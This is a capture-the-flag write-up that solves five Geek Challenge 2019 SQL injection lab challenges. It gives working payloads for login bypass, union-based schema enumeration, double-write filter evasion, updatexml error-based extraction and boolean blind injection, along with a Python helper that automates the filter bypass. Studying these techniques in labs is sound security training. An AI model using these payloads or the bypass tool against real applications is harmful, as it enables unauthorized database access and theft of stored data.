Geek Challenge 2019: SQL injection, five challenges (write-up)
2022-07-28 06:15:00 【cainsoftware】
01. [Geek Challenge 2019] EasySQL
02. [Geek Challenge 2019] LoveSQL
03. [Geek Challenge 2019] BabySQL
04. [Geek Challenge 2019] HardSQL
05. [Geek Challenge 2019] FinalSQL
Pass-01

The first challenge needs nothing fancy: the universal password logs in directly (the qwe after the -- is filler so the space MySQL requires after the comment marker is not lost).

payload: admin' or 1=1 -- qwe

Pass-02

The challenge hint says the flag is not in the current table. First test the quote closure with the universal password.

The login-success prompt shows the single-quote closure is right; next, enumerate the other tables (the + after -- is filler with the same purpose as the qwe above).
admin' or 1=1 -- +  // confirm the closure
admin' order by [1,2,3,4] -- +  // count the columns: order by 3 is fine, order by 4 errors, so the query returns 3 columns
1' union select 1,2,3 -- +  // find the echo points: columns 2 and 3 are displayed
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- +  // table names in the current database
Echo: geekuser,l0ve1ysq1
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' -- +  // column names
Echo: id,username,password
1' union select 1,2,group_concat(password) from l0ve1ysq1 where password like '%flag%' -- +  // too many rows to read through, so a where ... like filter pulls out just the flag
Echo: flag{13ea6ec1-392d-4bed-9e4d-e6dbdf723b33}

Pass-03

Start with the basic test; the first attempt comes back with an error (the error page is shown in the original post's screenshot).

In the echoed statement there is nothing left in front of 1=1 where the or should be, so the filtering the challenge mentions is stripping or.
A few ways around a keyword filter:
1. Case variation (does not work here: the filter ignores case)
2. Double-writing the keyword (works)
3. Replacing or with the || operator (works)
union and the other keywords turn out to be filtered as well, so I simply double-write everything:
admin' oorr 1=1 -- +  // logs in
admin' oorrder bbyy 3 -- +  // 3 columns
// This one is annoying: the flag is not in the current database at all, so go back and enumerate the databases.
admin1' ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata -- +  // database names (the or inside information_schema is stripped too, hence infoorrmation; admin1 is a user that does not exist, so only the union row is echoed)
Echo: information_schema,mysql,performance_schema,test,ctf,geek
admin1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema="ctf" -- +  // tables in ctf. To find out which words are filtered, put a normal value in the username box and the word under test in the password box: if the page answers 'Input your username and password', the word was stripped entirely. Trial and error. Single quotes around ctf did not work for me, so I used double quotes.
Echo: Flag
admin1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='Flag' -- +  // columns
Echo: flag
admin1' ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag -- +  // qualify the table as database.table, since Flag is not in the current database
Echo: flag{c320590e-cd73-466f-8253-07b7eb730eb2}
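To see why double-writing survives a one-pass keyword filter while case changes do not, here is an added example (my code, not the write-up's or the challenge's source): a Python model of a str_replace-style filter and a helper that double-writes a clean query automatically, including keywords hiding inside identifiers such as information_schema. The keyword list (or, and, union, select, from, where, by), the single-pass removal and the case-insensitive matching are assumptions inferred from the observations above, not the challenge's actual server code.

```python
"""Model of a one-pass keyword filter and the double-write bypass.

Added example: the keyword list and the case-insensitive, single-pass
removal are assumptions inferred from the write-up, not the challenge's
real server code.
"""
import re

# Keywords the write-up saw stripped (or, union) or had to double-write.
FILTERED = ["or", "and", "union", "select", "from", "where", "by"]


def server_filter(user_input: str) -> str:
    """Assumed server behaviour: each keyword is removed once, ignoring case,
    in a single pass over the input (str_ireplace / preg_replace style).
    Case variation therefore fails, while || and double-written words survive."""
    out = user_input
    for kw in FILTERED:
        out = re.sub(re.escape(kw), "", out, flags=re.IGNORECASE)
    return out


def double_write(query: str) -> str:
    """Insert a full copy of every filtered keyword into the middle of each
    occurrence: union -> ununionion, from -> frfromom, or -> oorr. One removal
    pass strips the inner copy and the two halves join back into the keyword.
    Keywords inside identifiers get the same treatment, which is why
    information_schema has to become infoorrmation_schema."""
    out = query
    for kw in FILTERED:
        cut = max(1, len(kw) // 2)

        def stuff(match: re.Match, kw: str = kw, cut: int = cut) -> str:
            seen = match.group(0)  # keep the user's original casing around the copy
            return seen[:cut] + kw + seen[cut:]

        out = re.sub(re.escape(kw), stuff, out, flags=re.IGNORECASE)
    return out


def survives(query: str) -> bool:
    """True if the double-written form comes out of the filter as the original."""
    return server_filter(double_write(query)) == query


if __name__ == "__main__":
    q = ("admin' union select 1,2,group_concat(schema_name) "
         "from information_schema.schemata -- +")
    print("filtered :", server_filter(q))            # union/select/from gone, infmation_schema
    print("doubled  :", double_write(q))
    print("restored :", server_filter(double_write(q)))
    print("UnIoN    :", repr(server_filter("admin' UnIoN")))  # case trick is stripped too
    print("||       :", repr(server_filter("admin' || 1=1")))  # operator survives
```

survives() is the check to run before sending a long double-written payload: if the filter also removes a word that is only produced after the first pass, the round trip fails and the helper tells you before you waste requests.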
For reference, the queries I was running before I found the right database:
admin1' ununionion seselectlect 1,2,group_concat(username) frfromom geekuser whwhereere username like '%flag%' -- +  // the column name password itself contains or and gets mangled by the filter; double-writing it did not work for me, so I hex-encoded it instead
admin1' ununionion seselectlect 1,2,group_concat(id) frfromom b4bsql -- +

Pass-04
The universal password is caught by the hint, so detection is probably a regular-expression match. Fuzz it with Burp Suite first to see which keywords still get through.

Filtered: and, |, if, sleep, substr, ascii. So blind injection is out, and throwing sqlmap at it fails as well.
or and updatexml are not filtered, so or combined with updatexml gives error-based injection. The payloads below avoid spaces by wrapping every term in parentheses and use like in place of =.
1'or(updatexml(1,concat('~',database(),'~'),1))#  // database name
Echo: ~geek~
1'or(updatexml(1,concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),'~'),1))#  // table names, like instead of =
Echo: ~H4rDsq1~
1'or(updatexml(1,concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),'~'),1))#  // columns
Echo: id,username,password
1'or(updatexml(1,concat('~',(select(password)from(H4rDsq1)where(username)like('%flag%')),'~'),1))#  // the flag itself
Echo: ~flag{2efa684f-dfe0-4b71-ad7f-97  // the XPath error message only carries 32 characters, so the value is cut off; substr is filtered, so split it with left and right instead
1'or(updatexml(1,concat('~',(select(right(password,30))from(H4rDsq1)where(username)like('%flag%')),'~'),1))#
Echo: ~f-dfe0-4b71-ad7f-978dfbcdfad4}~
Stitching the two pieces together (they overlap, so line up the common part):
flag{2efa684f-dfe0-4b71-ad7f-97
            f-dfe0-4b71-ad7f-978dfbcdfad4}
Result: flag{2efa684f-dfe0-4b71-ad7f-978dfbcdfad4}

Pass-05
As the hint says, this is blind SQL injection. The passwords 1 to 5 are useless, and passing id=6 as the hint suggests goes nowhere either. The username is hard-coded: writing admin directly gets caught.

With parentheses filtered there, the input box is hard going, so I gave up on that injection point and moved to the id parameter.
id=1^1  gives ERROR!!!
id=1^1^1  gives the normal page, so the last 1 is where the condition goes: 1^1 is 0 and 1^1^1 is 1 again, so with id=1^(cond)^1 a true condition renders the normal page and a false one gives ERROR!!!, which turns the page into a boolean oracle.
I tried updatexml, no luck; time-based blind with sleep does not work either; but ascii and substr are usable, and the truth value of the condition is echoed as described above.
Payload:
(length(database())>1)  // database name length (skipped)
ascii(substr(database(),1,1))>1  // database name characters (skipped)
(length((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))>1)  // length of the table-name list: 16
ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),i,1))=s  // run through Burp Suite: i goes 1..16 from the length above, s is the ASCII code, at most 128 values
Table => 70 49 110 97 73 49 121 44 70 108 97 97 97 97 97 103 => F1naI1y,Flaaaaag  // I checked the Flaaaaag table first; the password is not in it at all and it is over 5000 characters long. Painful.
(length((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')))>1)  // length of the column list: 20
(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),i,1))=s)
Table => 105 100 44 117 115 101 114 110 97 109 101 44 112 97 115 115 119 111 114 100 => id,username,password
(length((select(group_concat(username))from(F1naI1y)))=50)  // length 50
(ascii(substr((select(group_concat(username))from(F1naI1y)),i,1))=s)
Table => 109 121 103 111 100 44 119 101 108 99 111 109 101 44 115 105 116 101 44 115 105 116 101 44 115 105 116 101 44 115 105 116 101 44 83 121 99 44 102 105 110 97 108 108 121 44 102 108 97 103 => mygod,welcome,site,site,site,site,Syc,finally,flag  // the Burp output was joined by replacing \r\n with a space in Notepad++
(length((select(group_concat(password))from(F1naI1y)))=213)  // length 213. Running this through Burp Suite was painful; I should write the Python myself instead of always copying other people's scripts, nothing sticks that way.
Final result: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{91a80fa0-b1ac-4a10-b36d-e605f80bd8f9}